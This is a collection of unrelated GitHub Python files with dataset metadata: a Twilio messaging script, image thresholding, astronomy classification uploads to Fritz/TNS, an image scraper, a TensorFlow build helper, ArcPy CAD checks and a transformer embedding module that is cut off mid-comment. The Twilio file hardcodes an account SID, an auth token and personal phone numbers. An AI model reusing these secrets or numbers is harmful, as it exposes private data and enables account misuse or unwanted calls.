# Download the helper library from https://www.twilio.com/docs/python/install from twilio.rest import Client # Your Account Sid and Auth Token from twilio.com/console # DANGER! This is insecure. See http://twil.io/secure account_sid = 'AC3f72ddfebffe2adae5b4efe0c6d9c9b6' auth_token = 'd45d3fcfab5be3e08985b77a3fd13103' client = Client(account_sid, auth_token) from twilio.rest import TwilioRestClient #填入你申请的号码 twilioNumber = '+19195253692' #填入你验证的手机号 myNumbers = ["+8618601156335", "+8618601156335", "+8618601156335", "+8613120090157", "+8613120090157"] #填入你想发送的信息 #Message message = 'Hi this is ravana!' client = Client(account_sid, auth_token) for myNumber in myNumbers: print("Sending", myNumber) msg = client.messages.create(to=myNumber, from_=twilioNumber, body=message) print(msg.sid) #Phone call: call = client.calls.create( url='http://demo.twilio.com/docs/voice.xml', to=myNumber, from_=twilioNumber) print(call.sid)
leemengwei/tasty_shrimp_skype
phone_with_twilio.py
phone_with_twilio.py
py
1,069
python
en
code
1
github-code
36
40861542036
import numpy as np from typing import List, Dict from math import ceil def _valleys(hist: Dict[int, int]) -> List[int]: """ Find the valleys of a histogram of gray levels Arguments: hist frequencies in the histogram of gray levels 0,1,...,L-1 (dictionary) Value: valleys returns an object with class 'list', list of integer values """ L = len(hist) toRight = list([False]*L) toLeft = list([False]*L) # Find when a frequency is less than or equal to the following one for i in range(0, L-1): toRight[i] = hist[i] <= hist[i+1] # Find when a frequency is less than the previous one for i in range(1, L): toLeft[i] = hist[i] < hist[i-1] # Find when both condition hold both = list(i and j for i, j in zip(toRight, toLeft)) val = list(i for i, x in enumerate(both) if x == True) return val def _valley_clustering(L: int, val: List[int]) -> np.ndarray: """ Find limits of the clusters of a histogram of gray levels according to given valleys Arguments: L number of gray levels 1,...,L val list of valleys Value: valley_clustering returns an object with class 'np.ndarray' """ # Find the amount of clusters n = len(val) + 1 clust = np.zeros((n, 2), dtype=np.uint8) # Find clusters clust[0] = [0, val[0] - 1] for i in range(1, n-1): clust[i] = [val[i-1], val[i] - 1] clust[n-1] = [val[n-2], L-1] return clust def _searching_window(clust: List[int]) -> np.ndarray: # Find length of the initial cluster n = clust[1] - clust[0] + 1 if n == 2: w = np.zeros((1, 2), dtype=np.uint16) w[0] = np.transpose(np.array(clust)) else: # Find length of the searching windows length = ceil(n / 2) total = n - length + 1 w = np.zeros((int(total), 2), dtype=np.uint16) # Find searching windows for j in range(total): w[j] = [clust[0] + j, ceil(clust[0] + j + length - 1)] return w
image-multithresholding/Image-multithresholding
src/image_multi_thresholding/thresholding_windows.py
thresholding_windows.py
py
2,140
python
en
code
1
github-code
36
15851928871
# python3 phbook = {} n = int(input()) for i in range(n): query = input().split() command = query[0] number = query[1] if command == "add": name = query[2] phbook[number] = name if command == "del": if number in phbook: phbook.pop(number) if command == "find": if number in phbook: print(phbook[number]) else: print("not found")
DA-testa/phone-book-DenissBondars
main.py
main.py
py
461
python
en
code
0
github-code
36
1141324769
import re import base64 import math from glob import glob from getpass import getpass from pprint import pprint from marshals.interface import api import tns.sedm_auto_tns as tns fritz_base_url = 'https://fritz.science/api/' fritz_classification_url = fritz_base_url + 'classification' fritz_redshift_update_url = fritz_base_url + 'sources/' def add_spec_attachment(obj_id, comment, fname, spec_id=None, testing=False): """ adds a comment (not autoannotation) with attachment to a particular SEDM spectrum on the view_spec page, which will also appear elsewhere. obj_id: <str> comment: <str> fname: <str> spec_id: <int> testing: <bool> are we just testing? return: True if success, False if not """ if obj_id is None or spec_id is None: print("ERROR - Unable to get info required to post comment") return False # read in file with open(fname, 'rb') as image_file: encoded = base64.b64encode(image_file.read()).decode('ascii') # create payload ddict = {'obj_id': obj_id, 'spectrum_id': spec_id, # these go 'text': comment, 'attachment': {'body': encoded, 'name': fname.split('/')[-1]}} if testing: print("TESTING add_spec_attachment(): no data sent to marshal") print("%s: %s encoded with length %d" % (obj_id, fname.split('/')[-1], len(encoded))) return True else: fritz_comment_url = fritz_base_url + 'spectra/%d/comments' % spec_id r = api("POST", fritz_comment_url, data=ddict) if 'success' in r['status']: r_data = r['data'] if 'comment_id' in r_data: print("Comment id = %d" % int(r_data['comment_id'])) print('{} uploaded'.format(fname.split('/')[-1])) return True else: print('error submitting comment with attachment') print(r['status']) print(r['message']) return False def add_spec_autoannot(obj_id, andic, spec_id=None, origin=None, testing=False): """ adds an autoannotation without attachment to a particular SEDM spectrum on the view_spec page, which will also appear elsewhere. obj_id: 'ZTF18aaaaaa', for example andic: <dict> of annotations spec_id: <int> origin: <str> giving origin of annotations testing: <bool> are we testing only? return: True if success, False if not """ ddict = {'origin': origin, 'data': andic} if testing: print("TESTING add_spec_autoannot(): no data sent to marshal") print(ddict) return True else: fritz_annotation_url = fritz_base_url + \ 'spectra/%d/annotations' % spec_id # fritz_annotation_url = fritz_base_url + \ # 'sources/%s/annotations' % obj_id r = api("POST", fritz_annotation_url, data=ddict) if 'success' in r['status']: r_data = r['data'] if 'annotation_id' in r_data: print("annotation id = %d" % int(r_data['annotation_id'])) print('{}: {} posted'.format(obj_id, origin)) return True else: print('error submitting annotation') print(r['status']) print(r['message']) return False def add_SNIascore_pysedm_autoannot(fname, object_id=None, spec_id=None, testing=False, upload_tns=True): """ adds autoannotations with SNIASCORE and error if SNIASCORE > 0.9, also adds SNIASCORE redshift and error fname: '*ZTF18aaaaaaa.txt' that has a bunch of "# SNIASCORE[something]: [val]" in the header object_id: (str) spec_id: (int) testing: (bool) upload_tns: (bool) returns: True if autoannotation works, False (and it'll exit early) otherwise """ tns_upl = False ann_upl = False file_ext = fname.split('.')[-1] assert file_ext == 'txt' or file_ext == 'ascii' with open(fname) as f: header = {line.split(':', 1)[0][1:].strip(): line.split(':', 1)[-1].strip() for line in f if line[0] == '#'} # SNIascore RESULTS if 'SNIASCORE' not in header: print(fname, "never run through SNIascore?") return ann_upl, tns_upl if float(header['SNIASCORE']) < 0: print('no score') return ann_upl, tns_upl # construct annotations dictionary if float(header['SNIASCORE']) >= 0.9: # Post classification if add_SNIascore_classification(fname, object_id=object_id, testing=testing): print("POSTed Ia classification to fritz") # Attempt to post to TNS if upload_tns: try: if tns.sedm_tns_classify(fname, ztfname=object_id, testing=testing): print("Uploaded SNIa classification to TNS") tns_upl = True else: print("Unable to upload SNIa classification to TNS") except: print("Problems connecting") else: print("Unable to post Ia classification to fritz") # Generate annotation dictionary andic = { 'SNIascore': header['SNIASCORE'], 'SNIascore_err': header['SNIASCORE_ERR'], 'SNIa_z': header['SNIASCORE_Z'], 'SNIa_z_err': header['SNIASCORE_ZERR'] } else: andic = { 'SNIascore': header['SNIASCORE'], 'SNIascore_err': header['SNIASCORE_ERR']} # construct origin # origin = 'SNIascore:spc%d' % spec_id origin = 'sedm:SNIascore' print(andic) return add_spec_autoannot(object_id, andic, spec_id=spec_id, origin=origin, testing=testing), tns_upl def add_SNIascore_classification(fname, object_id=None, testing=False): """ adds SNIASCORE "Ia" classification if SNIASCORE > 0.9 fname: '*ZTF18aaaaaaa.txt' that has a bunch of "# SNIASCORE[something]: [val]" in the header object_id: (str) testing: (bool) returns: True if classification works, False (and it'll exit early) otherwise """ file_ext = fname.split('.')[-1] assert file_ext == 'txt' or file_ext == 'ascii' with open(fname) as f: header = {line.split(':', 1)[0][1:].strip(): line.split(':', 1)[-1].strip() for line in f if line[0] == '#'} # SNIascore RESULTS if 'SNIASCORE' not in header: print(fname, "never run through SNIascore?") return False if float(header['SNIASCORE']) < 0: print('no score') return False # construct annotations dictionary if float(header['SNIASCORE']) >= 0.9: cldict = { "obj_id": object_id, "classification": "Ia", "taxonomy_id": 3, "probability": float(header['SNIASCORE']) } if testing: print("TESTING add_SNIascore_classification():" " no data sent to marshal") print(cldict) return True else: r = api("POST", fritz_classification_url, data=cldict) if 'success' in r['status']: r_data = r['data'] if 'classification_id' in r_data: print("classification id = %d" % int(r_data['classification_id'])) print('{}: Ia classification posted'.format(object_id)) # now add redshift if 'SNIASCORE_Z' in header and 'SNIASCORE_ZERR' in header: # What is the current redshift set to? rc = api("GET", fritz_redshift_update_url + object_id) if 'success' in rc['status']: rc_data = rc['data'] current_redshift = None if 'redshift' in rc_data: current_redshift = rc_data['redshift'] # Only set redshift if it is not already set if current_redshift is None: new_redshift = float(header['SNIASCORE_Z']) new_redshift_error = float(header['SNIASCORE_ZERR']) try: new_z_round = math.ceil(abs( math.log10(new_redshift_error))) # Handle negative, NaN, Inf, None and <str> values except (ValueError, OverflowError, TypeError): new_z_round = 1 new_z = round(new_redshift, 1 if new_z_round < 1 else new_z_round) new_error = round(new_redshift_error, 1 if new_z_round < 1 else new_z_round) rsdict = {"redshift": new_z, "redshift_error": new_error} rr = api("PATCH", fritz_redshift_update_url + object_id, data=rsdict) if 'success' in rr['status']: print("redshift for %s updated to %.4f +- %.4f" % (object_id, rsdict['redshift'], rsdict['redshift_error'])) else: print('error updating %s redshift' % object_id) print(rr['status']) print(rr['message']) else: print('Redshift for %s already set to %.4f' % (object_id, float(rc_data['redshift']))) else: print('error getting current redshift for %s' % object_id) else: print('No SNIascore redshift records found for %s ' % object_id) return True else: print('error submitting classification') print(r['status']) print(r['message']) return False return False def add_SNID_pysedm_autoannot(fname, object_id=None, spec_id=None, testing=False): """ if z < 0.3 and rlap > 5.0 adds autoannotations with SNID rlap, z, type, etc adds a comment with the SNID plot attached fname: '*ZTF18aaaaaaa.txt' that has a bunch of "# SNIDMATCH[something]: [val]" in the header cred: ('username', 'password') reducedby: (str) testing: (bool) returns: True if all four comments/attachments works, False (and it'll exit early) otherwise """ file_ext = fname.split('.')[-1] assert file_ext == 'txt' or file_ext == 'ascii' with open(fname) as f: header = {line.split(':', 1)[0][1:].strip().lower(): line.split(':', 1)[-1].strip() for line in f if line[0] == '#'} # Upload pysedm_report try: pysedm_report = glob(fname.replace('spec', 'pysedm_report').replace('.txt', '.png'))[0] pr_posted = add_spec_attachment(object_id, 'pysedm_report:spc%d' % spec_id, pysedm_report, spec_id=spec_id, testing=testing) except IndexError: print('no pysedm_report for {}?'.format(header['name'])) pr_posted = False # SNID RESULTS if 'snidmatchtype' not in header: print(fname, "never run through snid?") return False if header['snidmatchtype'].lower() == 'none': print('no match') return False elif float(header['snidmatchrlap']) < 5: print('bad rlap, only {}'.format(header['snidmatchrlap'])) return False elif (header['snidmatchtype'][0] == 'I') \ and not (0.01 <= float(header['snidmatchredshift']) <= 0.3): print('bad redshift, {snidmatchredshift} ' 'for {snidmatchtype}'.format(**header)) return False if header['snidmatchsubtype'] == '-': header['snidmatchmatch'] = header['snidmatchtype'] else: header['snidmatchmatch'] = '-'.join([header['snidmatchtype'], header['snidmatchsubtype']]) # construct annotations dictionary andic = {'match': 'None', 'rlap': 0., 'redshift': 0., 'age': 0.} for key in andic: andic[key] = header['snidmatch' + key] # construct origin # origin = 'sedm:spc%d' % spec_id origin = 'sedm:SNID' if not add_spec_autoannot(object_id, andic, spec_id=spec_id, origin=origin, testing=testing): return False if pr_posted: return True # we already have an attachment comment so don't overwrite # SNID PLOT # NOTE: this makes a major assumption about the naming scheme of snid plots image_filename = fname.replace('.txt', '_{}.png'.format(header['snidmatchtype'])) if not glob(image_filename): return False ret = add_spec_attachment(object_id, 'AUTO_SNID_plot', image_filename, spec_id=spec_id, testing=testing) return ret if __name__ == "__main__": auth = (input('GROWTH marshal username:'), getpass()) successes = [] for filename in glob('*ZTF?????????.txt'): if add_SNID_pysedm_autoannot(filename, auth): print('success!') successes.append(re.findall(r'ZTF\d{2}[a-z]{7}', filename)[-1]) break pprint(successes)
scizen9/sedmpy
fritz/fritz_commenter.py
fritz_commenter.py
py
14,311
python
en
code
5
github-code
36
625331659
import os import time from io import BytesIO import aiohttp import asyncio import requests from PIL import Image from lxml import etree # import pandas as pd class Spider(object): """ 下载路径在实例化时候指定,比如:r'd:\test\\',这个目录如果不存在,会出错。 如果想给文件名加前缀,只要在目录下加前缀就行,比如:r'd:\test\abc',那么生成的文件前面都有abc 默认路径为当前文件下的downpic目录,此目录如果不存在会自动生成 """ def __init__(self, down_path=''): self.headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' } self.num = 0 if down_path == "": if 'downpic' not in os.listdir('.'): # 当前目录下的downpic目录 os.mkdir('downpic') self.path = os.path.join(os.path.abspath('.'), 'downpic') os.chdir(self.path) # 进入文件下载路径 self.down_path = down_path self.url = 'https://apps.wow-trend.com/api/trend/picture/get-list' self.params = {'nav_id': '35', 'gender_id': '72105', 'size': '60', 'page': '1', 'attrs': '[]'} def get_img_links(self, page, get_total_page=False): # 获取图片连接 self.params['page'] = str(page) # try: print('正在爬取页数:', page) r = requests.get(url=self.url, headers=self.headers, params=self.params) result = r.json() if get_total_page: return result['data']['totalPage'] # 获取总页数 urls_info = result['data']['list'] print('本页{}张图片'.format(len(urls_info))) return urls_info # except Exception as e: # print(e) async def get_sub_img_links(self, url): # 获取大图图片连接 # print(url) async with aiohttp.ClientSession(headers=self.headers) as session: r = await session.get(url) rtext = await r.text() el = etree.HTML(rtext) # 获取作者信息 author_path = '//*[@id="__next"]/div/main/div[1]/div/div[3]/div[1]/div[1]/span[2]/a' author = el.xpath(author_path)[0] author_name = author.xpath('./text()')[0] author_code = author.xpath('./@href')[0].split('/')[-1] author_info = f'{author_name}_{author_code}' # print(author_info) # 获取作者信息结束 pic_xpath = '//*[@id="__next"]/div/main/div[1]/div/div[2]/div/div[1]/figure/img/@data-src' await self.__download_img(el.xpath(pic_xpath)[0], crop=True, prefix=author_info) def _write_img(self, file_name, content): # if not crop: file_name_resize = os.path.join(self.down_path, '略缩图', file_name) self._resize_image(BytesIO(content), outfile=file_name_resize) # else: file_name_crop = os.path.join(self.down_path, '裁剪图', file_name) self._img_crop(BytesIO(content), output_fullname=file_name_crop) self.num += 1 async def _get_content(self, link, filename=False): # 传入的是图片连接 if link.startswith('//'): link = f'https:{link}' async with aiohttp.ClientSession() as session: # try: async with session.get(url=link) as response: content = await response.read() extend = link.split('.')[-1] if filename: filename = f'{filename}.{extend}' else: filename = f'{self.num}.{extend}' self._write_img(filename, content) # except (asyncio.TimeoutError, ClientPayloadError): # pass def run(self, startpage=1, endpage=1): """ q:要查询的内容 startpange:开始爬取的页面,默认为1 endpage:结束页数,默认为1,如果此参数为0,那么就会下载全部页面的图片 """ start = time.time() if endpage == 0: endpage = self.get_img_links(1, get_total_page=True) print(f'总页数:{endpage}') for page in range(startpage, endpage + 1): # 下载一百页的图片就能够了,或者本身更改页数 picurls = self.get_img_links(page) # 把那一页须要爬图片的连接传进去 # print(picurls) if picurls: # tasks = [asyncio.ensure_future(self.__download_img(picurl)) for picurl in picurls] tasks_crop = [asyncio.ensure_future(self._get_content(d['big_path'], d['id'])) for d in picurls] loop = asyncio.get_event_loop() loop.run_until_complete(asyncio.gather(*tasks_crop, return_exceptions=False)) end = time.time() print(f"共运行了{(end - start):.0f}秒") def _resize_image(self, infile, outfile='', minsize=300, is_file=True): # 把图片像素改成308 """修改图片尺寸 :param infile: 图片源文件 :param outfile: 输出文件名,如果为空,那么直接修改原图片 :param minsize: min长宽 :return: """ im = Image.open(infile) if is_file else infile if min(im.size) > minsize: x, y = im.size if x < y: y = int(y * minsize / x) x = minsize else: x = int(x * minsize / y) y = minsize im = im.resize((x, y), 1) if not outfile: outfile = infile # 如果路径不存在,那么就创建 ckpath = os.path.dirname(outfile) if not os.path.exists(ckpath): os.makedirs(ckpath) im.save(outfile) def _img_crop(self, input_fullname, output_fullname): img = Image.open(input_fullname) 图片大小 = img.size 比率 = 图片大小[0] / 图片大小[1] 图片宽 = 图片大小[0] 图片高 = 图片大小[1] 矩形边长 = (((图片宽 / 2) + (图片高 / 2)) * 2) / 4 # 横形图片矩形高=图片高*0.8v x1 = x2 = y1 = y2 = 0 if 0.7 <= 比率 <= 1.4: x1 = 图片宽 * 0.1 y1 = 图片高 - (矩形边长 + 图片高 * 0.1) x2 = x1 + 矩形边长 y2 = 图片高 - (图片高 * 0.1) elif 比率 < 0.7: # 竖的 x1 = 图片宽 * 0.05 y1 = 图片高 - (矩形边长 + 图片高 * 0.02) x2 = x1 + 矩形边长 y2 = 图片高 - (图片高 * 0.02) elif 比率 > 1.4: # 横的 x1 = 图片宽 * 0.02 y1 = 图片高 * 0.02 x2 = x1 + 矩形边长 y2 = y1 + 矩形边长 cropped = img.crop((x1, y1, x2, y2)) 转换 = cropped.convert('RGB') self._resize_image(转换, outfile=output_fullname, is_file=False) def main(): down_path = r'd:\download' spider = Spider(down_path) spider.run(startpage=1, endpage=0) print(f'共下载图片:{spider.num}') if __name__ == '__main__': main()
chenxy2022/long
wow.py
wow.py
py
7,151
python
en
code
0
github-code
36
72547899303
from tools.build_utils import * import os, shutil import argparse def main(): # Command line parser options parser = argparse.ArgumentParser( formatter_class=argparse.RawTextHelpFormatter) parser.add_argument( '--tf_version', type=str, help="TensorFlow tag/branch/SHA\n", action="store", default="v2.9.3") parser.add_argument( '--output_dir', type=str, help="Location where TensorFlow build will happen\n", action="store", required=True) parser.add_argument( '--target_arch', help= "Architecture flag to use (e.g., haswell, core-avx2 etc. Default \'native\'\n", default="native") parser.add_argument( '--use_intel_tensorflow', help="Build using Intel TensorFlow.", action="store_true") parser.add_argument( '--cxx11_abi_version', help="Desired version of ABI to be used while building Tensorflow", default='1') parser.add_argument( '--resource_usage_ratio', help="Ratio of CPU / RAM resources to utilize during Tensorflow build", default=0.5) arguments = parser.parse_args() # Check bazel version bazel_kind, bazel_ver = get_bazel_version() got_correct_bazel_version = bazel_kind == 'Bazelisk version' if (not got_correct_bazel_version and int(bazel_ver[0]) < 2): raise Exception("Need bazel version >= 2.0.0 \n" + "Got: " + '.'.join(bazel_ver)) if not os.path.isdir(arguments.output_dir): os.makedirs(arguments.output_dir) if not os.path.isdir(arguments.output_dir): raise AssertionError("Did not find output directory: " + arguments.output_dir) if not os.path.exists(arguments.output_dir): raise AssertionError("path doesn't exist {0}".format( arguments.output_dir)) os.chdir(arguments.output_dir) if (platform.system() == 'Windows'): venv_dir = '.\\venv3\\' else: venv_dir = './venv3/' install_virtual_env(venv_dir) load_venv(venv_dir) setup_venv(venv_dir, arguments.tf_version) if not os.path.exists(arguments.output_dir): raise AssertionError("Directory doesn't exist {0}".format( arguments.output_dir)) if not os.path.isdir(os.path.join(arguments.output_dir, "tensorflow")): # Download TensorFlow download_repo("tensorflow", "https://github.com/tensorflow/tensorflow.git", arguments.tf_version) else: pwd = os.getcwd() if not os.path.exists(arguments.output_dir): raise AssertionError("Path doesn't exist {}".format( arguments.output_dir)) os.chdir(os.path.join(arguments.output_dir, "tensorflow")) call(["git", "fetch"]) command_executor(["git", "checkout", arguments.tf_version]) call(["git", "pull"]) if not os.path.exists(pwd): raise AssertionError("Path doesn't exist {0}".format(pwd)) os.chdir(pwd) # Build TensorFlow build_tensorflow( arguments.tf_version, "tensorflow", 'artifacts', arguments.target_arch, False, arguments.use_intel_tensorflow, arguments.cxx11_abi_version, resource_usage_ratio=float(arguments.resource_usage_ratio)) # Build TensorFlow C++ Library build_tensorflow_cc( arguments.tf_version, "tensorflow", 'artifacts', arguments.target_arch, False, arguments.use_intel_tensorflow, arguments.cxx11_abi_version) pwd = os.getcwd() if (platform.system() == 'Windows'): artifacts_dir = os.path.join(pwd, 'tensorflow') else: artifacts_dir = os.path.join(pwd, 'artifacts/tensorflow') os.chdir("tensorflow") copy_tf_to_artifacts(arguments.tf_version, artifacts_dir, None, arguments.use_intel_tensorflow) print('\033[1;35mTensorFlow Build finished\033[0m') print( 'When building openvino_tensorflow using this prebuilt tensorflow, use:' ) print('\033[3;34mpython3 build_ovtf.py --use_tensorflow_from_location ' + os.path.abspath(arguments.output_dir) + '\033[1;0m') if __name__ == '__main__': main() # Usage # Build TF once # ./build_tf.py --tf_version v1.15.2 --output_dir /prebuilt/tf/dir # # Reuse TF in different openvino_tensorflow builds # mkdir ovtf_1; cd ovtf_1 # git clone https://github.com/openvinotoolkit/openvino_tensorflow.git # ./build_ovtf.py --use_tensorflow_from_location /prebuilt/tf/dir # cd ..; mkdir ovtf_2; cd ovtf_2 # git clone https://github.com/openvinotoolkit/openvino_tensorflow.git # ./build_ovtf.py --use_tensorflow_from_location /prebuilt/tf/dir
openvinotoolkit/openvino_tensorflow
build_tf.py
build_tf.py
py
4,841
python
en
code
176
github-code
36
1908225099
print("Enter the last digit of the serial number") serial = int(input()) serialeven = False if serial % 2 == 0: serialeven = True print("Enter the number of batteries on the bomb:") batteries = int(input()) print("Does the bomb have a parallel Port?(y/n)") hasParallel = False a = input() if a == "y": hasParallel = True for i in range(6): print(f"Cable nr {i+1}: Enter *,L,R,B as string") s = str.lower(input()) hasStar = False hasLED = False isRed = False isBlue = False if "*" in s: hasStar = True if "l" in s: hasLED = True if "r" in s: isRed = True if "b" in s: isBlue = True
TimoLob/KTANE-Bot
complicatedcable.py
complicatedcable.py
py
671
python
en
code
0
github-code
36
28078901449
# coding: utf-8 # Your code here! n = int(input().rstrip()) class Node: __slots__ = ['key', 'left', 'right', 'parent'] def __init__(self, key): self.key = int(key) self.left = self.right = self.parent = None root = None def insert(node): global root y, x = None, root while x != None: y = x if node.key < x.key: x = x.left else: x = x.right if y == None: root = node elif node.key < y.key: node.parent = y y.left = node else: node.parent = y y.right = node def find(key): global root node = root num = int(key) while node != None and node.key != num: if num < node.key: node = node.left else: node = node.right return node def delete(key): global root z = find(key) y = x = None if z.left == None or z.right == None: y = z else: y = getSuccessor(z) # 子の操作 if y.left != None: x = y.left else: x = y.right if x != None: x.parent = y.parent if y.parent == None: root = x elif y == y.parent.left: y.parent.left = x else: y.parent.right = x if y != z: z.key = y.key def getSuccessor(x): if x.right != None: return getMinimum(x.right) y = x.parent while y != None and x == y.right: x = y y = y.parent return y def getMinimum(node): while node.left != None: node = node.left return node def inOrder(node): return inOrder(node.left) + " " + str(node.key) + inOrder(node.right) if node else '' def preOrder(node): return " " + str(node.key) + preOrder(node.left) + preOrder(node.right) if node else '' for i in range(n): command = input().rstrip().split() if command[0] == "insert": insert(Node(command[1])) elif command[0] == "delete": delete(command[1]) elif command[0] == "find": if find((command[1])) is None: print("no") else: print("yes") elif command[0] == "print": print(inOrder(root)) print(preOrder(root))
negiandleek/til
aoj/ALDS1_8_A_Binary_Search_Tree_III.py
ALDS1_8_A_Binary_Search_Tree_III.py
py
2,320
python
en
code
0
github-code
36
3026799734
# -*- coding: utf-8 -*- import arcpy,math import pandas as pd import numpy as np import uuid,json,datetime,sys,csv,os from scipy.spatial import distance_matrix arcpy.env.overwriteOutPut = True from Basic_Tools import * from Engine_class import Layer_Engine print_arcpy_message('# # # # # S T A R T # # # # #') # # # In Put # # # # DWGS = [r"C:\GIS_layers\Vector\bad_DWG\14_1_2021\50552-1.dwg"] DWGS = arcpy.GetParameterAsText(0).split(';') # # # Preper Data # # # scriptPath = os.path.abspath (__file__) folder_basic = os.path.dirname (scriptPath) Tamplates = folder_basic + "\\" + "Tamplates" GDB_file = folder_basic + "\\" + "Temp" for DWG in DWGS: print_arcpy_message (DWG,1) DWG_name = os.path.basename(DWG).split(".")[0] fgdb_name = Create_GDB (GDB_file,DWG_name) csv_name = GDB_file + '\\' + DWG_name +'.csv' mxd_path = Tamplates + '\\' + 'M1200_M1300.mxd' gdb_path = Tamplates + '\\' + 'temp.gdb' dwg_path = GDB_file + '\\' + DWG_name + '.dwg' # # # Get M1200 and M1300 to a layer # # # Polyline = DWG + '\\' + 'Polyline' Filter = "\"Layer\" IN('M1200','M1300')" layer_name = 'Line_M1200_M1300' layers_M1200_M1300 = Extract_dwg_to_layer (fgdb_name,Polyline,layer_name,Filter) # # # Get all blocks and declaration # # # Point = DWG +'\\' + 'Point' layer_name2 = 'Blocks' layers_Block = Extract_dwg_to_layer (fgdb_name,Point,layer_name2) declaration = fgdb_name + '\\' + 'declaration' arcpy.Select_analysis (layers_Block,declaration,"\"Layer\" in ('declaration','DECLARATION','Declaration')") # # # Get polygon M1200 and M1300, if not found, Create from Line # # # polygon = DWG +'\\' + 'Polygon' Filter3 = "\"Layer\" IN('M1200','M1300')" layer_name3 = "Poly_M1200_M1300" layers_Poly = fgdb_name + '\\' + layer_name3 try: arcpy.FeatureClassToFeatureClass_conversion( polygon, fgdb_name, layer_name3, Filter3) print ('Create FeatureClassToFeatureClass_conversion') except: print ('didnt Create FeatureClassToFeatureClass_conversion, trying creating polygon from line') # Create Polygon M1200 poly_M1200 = 'in_memory' + '\\' + 'poly_M1200' Create_Polygon_From_Line (layers_M1200_M1300 ,poly_M1200 ,"\"Layer\" = 'M1200'","'M1200'") Create_Polygon_From_Line (layers_M1200_M1300,layers_Poly ,"\"Layer\" = 'M1300'","'M1300'") # Combine Polygons arcpy.Append_management (poly_M1200,layers_Poly, "NO_TEST") # # # Reading Files # # # blocks = Layer_Engine (layers_Block ,'all') delcar = Layer_Engine (declaration ,'all') lines_M = Layer_Engine (layers_M1200_M1300 ,["Layer","Entity","LyrHandle"]) poly_M = Layer_Engine (layers_Poly ,'all') blocks.Extract_shape () delcar.Extract_shape () lines_M.Extract_shape () # # # Action # # # cheak_version = cheak_cad_version (DWG) Check_decler = cheak_declaration (delcar,lines_M) check_Blocks = Check_Blocks (blocks,Point,lines_M) check_Lines = Check_Lines (lines_M) check_CADtoGeo = Cheak_CADtoGeoDataBase(DWG,fgdb_name) check_annotation = get_crazy_long_test (DWG) data_csv = cheak_version + Check_decler + check_Blocks + check_Lines + check_CADtoGeo + check_annotation Create_CSV (data_csv,csv_name) mxd_pdf_making (mxd_path,gdb_path,DWG_name,fgdb_name,GDB_file) print_arcpy_message('# # # # # F I N I S H # # # # #')
medad-hoze/EM_3
Old/Engine_main.py
Engine_main.py
py
3,885
python
en
code
0
github-code
36
13019170409
import torch import math from torch import nn import torch.nn.functional as F # Objective: learn embedding vector for each "relative" position # Steps: (1) Identify matrix of possible relatives (sent_len, sent_len) "clamped values" # (2) Identify embedding vector with possible vocabs of relatives (vocab, emb) # (3) Input 1 into 2 to have position matrix to learn on (PER SENTENCE) class RelativePosition(nn.Module): # 2 stages: embeddings with vocab of available relativities + tokens of indices/relatives to learn each relative position def __init__(self, max_relative_position, head_dim, device): super().__init__() self.head_dim = head_dim self.max_relative_position = max_relative_position # embedding: (vocab x emb_dim): vocab here is of size --> max * 2 (left/right) + 1 (relation with myself). e.g. (max = 3; "3*2+1 = 7") # embedding table is table of random embeddings that learns by time. we only specify the size of available vocab here # Embedding we have 512 vector as embedding representing each token in vocab (Initialization) # When we use the embedding (pass sentence to it) --> we get the corresponding 512 vector of each token from sentence (vocab) then we change this by learning until its suitable for all sentences self.embedding_table = nn.Embedding(max_relative_position*2 + 1, head_dim) # nn.embedding (num_possible_emb_dict, emb_dim), Out shape: (*, emb_dim) --> where * is same as input shape self.device = device def forward(self, len_q, len_k): # for self attention (q/k/v) have same length as sequence, but this isn't always the case possible_relatives_1d_q = torch.arange(len_q) possible_relatives_1d_k = torch.arange(len_k) # Make row matrix - column matrix [0, 1, 2, 3] - [[0, 1, 2, 3]] --> subtract full row from each token in column # q is fixed in 2nd position (for its the query in hand?) possible_relatives_2d = possible_relatives_1d_k[None, :] - possible_relatives_1d_q[:, None] # (Instead of None: put 1) clamped_relatives_2d = torch.clamp(possible_relatives_2d, -self.max_relative_position, self.max_relative_position) # clamp that no min is less than specified min and same for max (relativity won't differ beyond that) # shape: len_q x len_k (self attention: seq_len x seq_len) # To make all positives (no -ve input to network) clamped_relatives_positive = clamped_relatives_2d + self.max_relative_position # converted from distance matrix (-ve & +ve) to a positive distance matrix represented as tokens for each position # Make in type long clamped_relatives_positive = torch.LongTensor(clamped_relatives_positive).to(self.device) # Q: should we make .device from here? Q: why to make it in "Long"? # this is the matrix that we want to input for embeddings to be learnt (each position will be represented by 512 embedding vector) # get the relative position embeddings [embedding vector for each relative position token] relative_position_embeddings = self.embedding_table(clamped_relatives_positive) # shape: len_q x len_k x head_dim return relative_position_embeddings class RelativePositionalEmbedding(nn.Module): def __init__(self, emb_dim, n_heads, max_relative_position, dropout, device): # here no need of vocab size as we can already infer from max_relative_pos super().__init__() # Q: do we need to add device information here? self.dropout, self.max_relative_position = dropout, max_relative_position # N_heads: instead of having one big embedding vector (512) we make 2 (256) --> both will pass on the same input and same everything self.emb_dim, self.n_heads = emb_dim, n_heads self.head_dim = emb_dim // n_heads # layers # This takes embedding and output embedding all of same dimension # --> reduction of head_dim happens during operations of attention but at last concatenated and pass through the linear self.q_linear, self.k_linear, self.v_linear = nn.Linear(emb_dim, emb_dim), nn.Linear(emb_dim, emb_dim), nn.Linear(emb_dim, emb_dim) # self.out = nn.Linear(emb_dim, emb_dim) # the output is emb_dim since we still want to o.p emb as this is pos emb (not vocab) self.relative_position_k = RelativePosition(max_relative_position, self.head_dim, device) self.relative_position_v = RelativePosition(max_relative_position, self.head_dim, device) self.scale_factor = torch.sqrt(torch.FloatTensor([self.head_dim])).to(device) self.dropout = nn.Dropout(dropout) def forward(self, q, k, v, atten_mask=None): # Q: mask here is the attention mask, right? # --------------------------------- Attention QK ----------------------- Question: what is the output from this? similarity between each word with all other words? # Beginning of Equation (5) --> e_ij # 1. normal self attention (qk) --> [ x*WQ * (x*WK)^T ] # q.shape: [batch_size, seq_len, emb_dim] batch_size, len_q, len_k, len_v = q.shape[0], q.shape[1], k.shape[1], v.shape[1] q, k = self.q_linear(q), self.k_linear(k) # QA: what is the difference between view and permute --> view: split/ chunk/ combine (reads data sequentially in any way you want), permute: only transpose what's already there q_heads = q.view(batch_size, -1 ,self.n_heads, self.head_dim) k_heads = k.view(batch_size, -1 ,self.n_heads, self.head_dim) # for each batch: we have each sequence defined by n heads, each head has head dim (10 sequences, each seq has 2 heads, each head has 256 